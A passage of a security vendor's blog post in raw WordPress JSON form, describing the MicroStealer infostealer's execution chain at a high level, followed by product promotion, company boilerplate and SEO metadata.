href=\"https:\/\/app.any.run\/tasks\/d59c90ed-820e-4f3d-be47-77bd997835aa\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">See the full execution chain<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"555\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1024x555.png\" alt=\"First\u00a0observed\u00a0analysis\u00a0session\u00a0with\u00a0MicroStealer\" class=\"wp-image-19739\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1024x555.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-300x163.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-768x416.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-1536x833.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-370x201.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-270x146.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1-740x401.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/Screenshot-2026-03-11-at-23.53.40-2048x1110-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>First&nbsp;observed&nbsp;analysis&nbsp;session&nbsp;with&nbsp;MicroStealer<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Inside the sandbox, analysts were able to quickly confirm how the threat unfolds and what data it targets. This kind of visibility helps security teams move from an unclear file to a confident verdict faster, reducing review time and lowering the chance of missed credential theft.&nbsp;<\/p>\n\n\n\n<p>How the attack unfolds:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>NSIS installer<\/strong>&nbsp;delivers the&nbsp;initial&nbsp;payload&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Electron loader<\/strong>&nbsp;requests elevated privileges and launches the next stage&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Java module<\/strong>&nbsp;executes the main stealer logic&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Browser credentials, session data, screenshots, and wallet files are collected&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Stolen data is sent to attacker-controlled infrastructure&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>What makes&nbsp;MicroStealer&nbsp;notable is not only what it steals, but how it delays confident detection. The layered&nbsp;<strong>NSIS \u2192 Electron \u2192 Java<\/strong>&nbsp;execution chain, combined with obfuscation and anti-analysis checks, makes the malware harder to understand during early triage.&nbsp;<\/p>\n\n\n\n<p>To review related sandbox analyses and broader activity, use the following; <a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI&nbsp;Lookup<\/a>&nbsp;query:&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/intelligence.any.run\/analysis\/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookup#{%22query%22:%22threatName:%5C%22microstealer%5C%22%22,%22dateRange%22:180}\" target=\"_blank\" rel=\"noreferrer noopener\">threatName:&#8221;microstealer&#8221;<\/a>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"565\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1024x565.png\" alt=\"Relevant sandbox sessions with\u00a0MicroStealer\" class=\"wp-image-19740\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1024x565.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-300x165.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-768x423.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-1536x847.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-370x204.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-270x149.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1-740x408.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/image12-2048x1129-1.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN&nbsp;TI&nbsp;Lookup&nbsp;demonstrates&nbsp;relevant sandbox sessions with&nbsp;MicroStealer<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>For organizations, this&nbsp;risk goes beyond a single infected endpoint. Stolen browser credentials and active sessions can give attackers access to SaaS apps, internal systems, and cloud services, increasing the chance of account compromise and broader intrusion.&nbsp;<\/p>\n\n\n\n<!-- Regular Banner START -->\n<div class=\"regular-banner\">\n<!-- Text Content -->\n<p class=\"regular-banner__text\"><span class=\"highlight\"> 64%\u00a0of Fortune\u00a0500 <\/span>companies\u00a0rely on ANY.RUN\n<br> to strengthen their SOC operations\n<\/p>\n<!-- CTA Link -->\n<a class=\"regular-banner__link\" id=\"article-banner-regular\" href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=major-cyber-attacks-march-2026&#038;utm_term=010426&#038;utm_content=linktoenterprise#contact-sales\" rel=\"noopener\" target=\"_blank\">\nIntegrate in your SOC\n<\/a>\n<\/div>\n<!-- Regular Banner END -->\n<!-- Regular Banner Styles START -->\n\n<style>\n.regular-banner {\ndisplay: flex;\ntext-align: center;\nflex-direction: column;\nalign-items: center;\ngap: 1.5rem;\nwidth: 100%;\npadding: 2rem;\nmargin: 1.5rem 0;\nborder-radius: 0.5rem;\nfont-family: 'Catamaran Bold';\nmargin-inline: auto;\nbackground: rgba(32, 168, 241, 0.1);\nborder: 1px solid rgba(75, 174, 227, 0.32);\n}\n\n.regular-banner__text {\nfont-size: 1.5rem;\nmargin: 0;\n}\n\n.highlight {\ncolor: #ea2526;\n}\n\n.regular-banner__link {\npadding: 0.5rem 1.5rem;\nfont-weight: 500;\ntext-decoration: none;\nborder-radius: 0.5rem;\ncolor: #FFFFFF;\nbackground-color: #1491D4;\ntext-align: center;\ntransition: all 0.2s ease-in;\n}\n\n.regular-banner__link:hover {\nbackground-color: #68CBFF;\ncolor: white;\n}\n<\/style>\n<!-- Regular Banner Styles END -->\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams detect threats earlier, investigate incidents faster, and build stronger response workflows. With&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">Interactive Sandbox<\/a>,&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence&nbsp;Lookup<\/a>, and&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>, the company gives SOC and MSSP teams the visibility and context they need to move from alert to confident decision more quickly.&nbsp;&nbsp;<\/p>\n\n\n\n<p>Today, more than <strong>15,000 organizations<\/strong> and <strong>600,000 security professionals<\/strong> worldwide rely on ANY.RUN. The company is <a href=\"https:\/\/any.run\/compliance\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-march-2026&amp;utm_term=010426&amp;utm_content=linktocompliance\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified<\/a>, reflecting its focus on strong security controls and customer data protection.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>March 2026 brought a wave of cyber attacks that reflected how quickly modern threats can move from subtle early signals to serious business impact. ANY.RUN analysts identified and explored several major threats this month, exposing phishing campaigns, stealthy malware, payment-skimming activity, and resilient botnet infrastructure affecting organizations across industries. From Microsoft 365 token abuse and [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":18895,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-19709","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Major Cyber Attacks in March 2026: EvilTokens, Magecart &amp; More<\/title>\n<meta name=\"description\" content=\"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"ANY.RUN\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"16 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"},\"author\":{\"name\":\"ANY.RUN\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0\",\"datePublished\":\"2026-04-01T12:08:31+00:00\",\"dateModified\":\"2026-04-03T13:10:40+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"},\"wordCount\":3102,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\",\"name\":\"Major Cyber Attacks in March 2026: EvilTokens, Magecart & More\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2026-04-01T12:08:31+00:00\",\"dateModified\":\"2026-04-03T13:10:40+00:00\",\"description\":\"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g\",\"caption\":\"ANY.RUN\"},\"url\":\"https:\/\/any.run\/cybersecurity-blog\/author\/a-bespalova\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Major Cyber Attacks in March 2026: EvilTokens, Magecart & More","description":"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","twitter_misc":{"Written by":"ANY.RUN","Est. reading time":"16 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/"},"author":{"name":"ANY.RUN","@id":"https:\/\/any.run\/"},"headline":"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0","datePublished":"2026-04-01T12:08:31+00:00","dateModified":"2026-04-03T13:10:40+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/"},"wordCount":3102,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","url":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/","name":"Major Cyber Attacks in March 2026: EvilTokens, Magecart & More","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2026-04-01T12:08:31+00:00","dateModified":"2026-04-03T13:10:40+00:00","description":"Explore the major cyber attacks in March 2026, including EvilTokens OAuth phishing, RUTSSTAGER, Magecart, MicroStealer, Kamasers, and more.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/major-cyber-attacks-march-2026\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Major Cyber Attacks in March 2026: OAuth Phishing,\u00a0SVG Smuggling,\u00a0Magecart, and More\u00a0"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"ANY.RUN","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4ce3a6c672056b4a8cd6b0110782215?s=96&d=mm&r=g","caption":"ANY.RUN"},"url":"https:\/\/any.run\/cybersecurity-blog\/author\/a-bespalova\/"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19709"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=19709"}],"version-history":[{"count":26,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19709\/revisions"}],"predecessor-version":[{"id":19818,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/19709\/revisions\/19818"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/18895"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=19709"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=19709"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=19709"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}